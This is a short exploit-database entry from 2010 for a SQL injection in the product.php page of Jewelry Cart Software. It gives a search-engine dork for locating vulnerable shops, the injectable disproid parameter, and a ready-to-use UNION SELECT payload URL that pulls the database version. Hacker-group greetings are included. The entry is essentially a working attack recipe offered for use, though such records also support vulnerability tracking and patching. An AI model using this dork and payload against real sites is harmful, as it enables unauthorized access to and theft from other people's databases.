Jewelry Cart Software - 'product.php' SQL Injection
Author: Asyraf
type: webapps
platform: php
port:
date_added: 2010-03-20
date_updated:
verified: 1
codes:
tags:
aliases:
screenshot_url:
application_url:
**************************************************************
# Name : Jewelry Cart Software SQL Injection (product.php) ::-
# Author : Asyraf (Mycrypto Security Force) r0x~!!
# Date : 20/3/2010
# Language : PHP
# Script : Jewelry Cart Software
# Shout : hMSecurity,n3wb0rn,TBD Security
# Dork : Powered by Jewelry Cart Software
product.php?disproid=
# Vulnerability : product.php?disproid=[ANY VALUE]
# Exploited : http://www.victim.com/product.php?disproid=53+AND+1=2+UNION+SELECT+0,1,version%28%29,3,4--
***************************************************************